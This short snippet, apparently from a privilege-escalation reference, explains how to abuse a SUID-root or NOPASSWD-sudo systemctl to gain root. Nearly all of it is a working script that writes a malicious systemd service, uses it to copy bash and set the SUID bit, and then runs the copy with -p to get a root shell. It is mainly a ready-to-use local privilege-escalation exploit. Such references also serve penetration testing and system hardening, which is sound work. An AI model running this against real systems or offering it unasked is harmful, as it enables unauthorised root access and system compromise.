If systemctl is SUID root, then a malicious service file can easily be abused to create a root shell.
FILE=`mktemp -u`
cat > ${FILE}.service << EOF
[Service]
Type=oneshot
ExecStart=/bin/cp /bin/bash ${FILE}.sh
ExecStart=/bin/chmod +xs ${FILE}.sh
[Install]
WantedBy=multi-user.target
EOF
systemctl link ${FILE}.service
systemctl start ${FILE}.service
${FILE}.sh -p # Root!Even if systemctl is not SUID root, so long as you have NOPASSWD sudo access to it this trick will still work.